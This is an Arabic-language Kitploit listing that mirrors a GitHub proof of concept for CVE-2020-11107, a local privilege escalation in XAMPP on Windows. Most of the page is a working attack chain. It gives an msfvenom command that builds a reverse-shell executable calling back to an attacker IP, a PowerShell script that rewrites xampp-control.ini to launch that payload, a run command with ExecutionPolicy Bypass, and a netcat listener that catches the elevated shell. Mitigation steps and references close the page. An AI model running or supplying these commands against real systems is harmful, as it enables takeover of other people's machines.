Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation — CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4 | Kitploit
أدوات/GitHubGitHub/mohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubmohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation

Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

🧨 CVE-2020-11107 – تصعيد الصلاحيات المحلية في XAMPP (ويندوز)

📌 نظرة عامة

CVE-2020-11107 هي ثغرة تصعيد صلاحيات محلية (LPE) تؤثر على Apache Friends XAMPP على ويندوز.

يمكن لمستخدم غير مميز تعديل ملف تكوين لوحة تحكم XAMPP (xampp-control.ini) واستبدال الملف التنفيذي الافتراضي للمحرر (notepad.exe) بملف تنفيذي ضار.
عندما يفتح مستخدم آخر (مثل المسؤول) السجلات عبر لوحة التحكم، يتم تنفيذ البرنامج الضار بصلاحيات الضحية، مما يؤدي إلى تصعيد الصلاحيات.

❗ هذه الثغرة لا تؤثر على لينكس أو ماك.


🎯 الإصدارات المتأثرة

  • XAMPP < 7.2.29
  • XAMPP 7.3.x < 7.3.16
  • XAMPP 7.4.x < 7.4.4

تم الاختبار على

  • ويندوز 10
  • XAMPP 7.3.10

🧠 السبب الجذري

  • xampp-control.ini قابل للكتابة عالمياً
  • مسارات المحرر / المتصفح موثوقة وتُنفذ
  • التغييرات في التكوين تؤثر على جميع المستخدمين
  • لا يوجد تحقق من صحة مسارات الملفات التنفيذية

🗂 الملفات المهمة

root@kitploit:~
C:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe

🔍 إثبات الثغرة

تحقق من إصدار XAMPP:

root@kitploit:~
type C:\xampp\properties.ini

مثال على الإخراج:

root@kitploit:~
base_stack_version=7.3.10-1
base_stack_platform=windows-x64

✅ الإصدار معرض للثغرة.


⚔️ خطوات الاستغلال (إثبات المفهوم)

1️⃣ إنشاء الحمولة الضارة (المهاجم – Kali)

root@kitploit:~
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe

2️⃣ نقل الحمولة إلى الهدف

root@kitploit:~
mkdir C:\temp
# رفع ملف msf.exe إلى C:\temp

3️⃣ تعديل تكوين XAMPP (مستخدم بصلاحيات منخفضة)

نص الاستغلال (PowerShell):

root@kitploit:~
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file

تنفيذ النص:

root@kitploit:~
powershell -ExecutionPolicy Bypass -File 50337.ps1

4️⃣ تشغيل الاستغلال (الضحية / المسؤول)

الضحية يقوم بتشغيل:

root@kitploit:~
C:\xampp\xampp-control.exe

ثم يفتح أي ملف سجل من لوحة التحكم.


5️⃣ استقبال الصدفة (المهاجم)

root@kitploit:~
nc -lvnp 4444

✅ النتيجة:

root@kitploit:~
Connection received...
C:\WINDOWS\system32>

🎉 تم تصعيد الصلاحيات بنجاح


📈 التأثير

  • تصعيد الصلاحيات محلياً
  • تنفيذ أوامر عشوائية
  • اختراق كامل للنظام (إذا قام المسؤول بتشغيله)

🛡 التخفيف

  • تحديث XAMPP إلى إحدى الإصدارات التالية (أو أحدث):

    • 7.2.29
    • 7.3.16
    • 7.4.4
  • تقييد الأذونات على:

root@kitploit:~
C:\xampp\xampp-control.ini
  • تجنب تشغيل لوحة تحكم XAMPP كمسؤول

📚 المراجع

  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11107
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2020-11107
  • إشعار Apache Friends: https://www.apachefriends.org/blog/new_xampp_20200401.html
  • Exploit-DB: https://www.exploit-db.com/exploits/50337
  • البحث الأصلي: https://github.com/S1lkys/CVE-2020-11107
تنزيل الأداة